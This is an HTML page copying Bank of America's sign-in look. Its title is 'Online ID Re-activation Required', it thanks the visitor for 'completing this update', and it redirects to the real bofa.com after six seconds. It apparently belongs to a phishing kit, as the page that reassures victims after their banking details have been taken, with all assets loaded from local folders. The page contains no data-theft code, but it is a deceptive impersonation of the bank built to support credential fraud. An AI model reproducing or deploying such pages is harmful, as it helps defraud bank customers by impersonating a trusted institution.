

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">	
<head> <!-- XENGINE LSU Vipaa 6.0 2012.08 r20 --><!-- TLDB false -->			<!-- TL-NOPV true -->
<title>Bank of America | Online Banking | Thank you.</title>
<META HTTP-EQUIV="Refresh" CONTENT="6;URL=http://www.bofa.com" >  
<meta http-equiv="content-type" content="text/html;charset=utf-8" />
<link rel="shortcut icon" href="img/favicon.ico" type="image/ico" /><!-- TLDB TEALEAF_UiCapture_APP_ENABLED_NOT_TRUE -->
<link rel="stylesheet" type="text/css" href="scripts/global-jawr.css" media="all" />
<link rel="stylesheet" type="text/css" href="scripts/vipaa-jawr.css" media="all" />
<script src="scripts/global-jawr.js" type="text/javascript"></script>
<script src="scripts/vipaa-jawr.js" type="text/javascript"></script>


<!-- PHASE 2B CHANGES currentLocation is /login/sign-in/unrecognized-computer -->
<style type="text/css"> body { display : none;} </style>
</head><body class="trfwl-body      ">
<script type="text/javascript">
if (self == top) {
		  var theBody = document.getElementsByTagName('body')[0];
		  theBody.style.display = "block";
		  } 
		  else { 
		  top.location = self.location;
		  }
		  </script>
		  <noscript><style>body{display : block;}</style></noscript>
		  <a class="ada-hidden" href="#skip-to-h1" name="anc-skip-to-main-content">Skip to main content</a>
		  <div class="two-row-flex-wideleft-layout">
		  <div class="center-content">
		  <div class="header"><div class="header-module">
		  <div class="fsd-secure-esp-skin">
    	  <img height="28" width="207" alt="Bank of America" src="img/bac_reg_logo_tmp_250X69.gif" />      <div class="page-type">Sign In</div>      <div class="right-links">		<div class="secure-area">Secure Area</div>       <a class="divide" href="" target="_self" name="spanish_toggle" title="Muestra esta sesi�n de la Banca en L�nea">En Espa&#241;ol</a>        <div class="clearboth"></div>      </div>      <div class="clearboth"></div>   </div></div><div class="page-title-module h-100">  		<div id="skip-to-h1" class="red-grad-bar-skin sup-ie">    		<h1>Online ID Re-activation Required</h1>  		</div></div>	<script type="text/javascript">	var continueURL = '/login/ping';	function myUrl() {			window.location =  '/login/sign-in/signOnScreen.go';			 		     	    	   	    	}</script>

</div>
				<div class="flex-top-row"></div>
				<div class="bottom-row">
				<div class="left-column"><div class="sitekey-questions-module">
				<div class="verify-comp-skin phoenix">
				<p>Thank you for completing this update.</p><p>Please wait while we securely log you out of the online banking session.</p><br><p align="center"><br>	<img src="img/Processing2.gif"></p>		</div></div></div>
				<div class="clearboth"></div>
				</div>
				<div class="footer">
				<div class="footer-inner">
				<div class="global-footer-module">
				<div class="gray-bground-skin">
				<div class="secure">Secure Area</div>
				<div class="link-container">
				<div class="link-row"> <a class="last-link" href="https://www.bankofamerica.com/privacy/" name="Privacy_&_Security_footer" title="Privacy & Security" target="_blank">Privacy &amp; Security</a>
				<div class="clearboth"></div>
				</div>
				</div>
				<p>Bank of America, N.A. Member FDIC. <a name="Equal_Housing_Lender" href="http://www.bankofamerica.com/help/equalhousing_popup.cfm" target="_blank">Equal Housing Lender<img style="vertical-align: baseline;" src="img/icon_equal_housing_lender.gif" alt="" hspace="3" width="14" height="9" /></a> <br />&copy; 2012 Bank of America Corporation. All rights reserved.</p>
				</div></div></div>
				</div>
				</div>
				</div>
				</body></html>
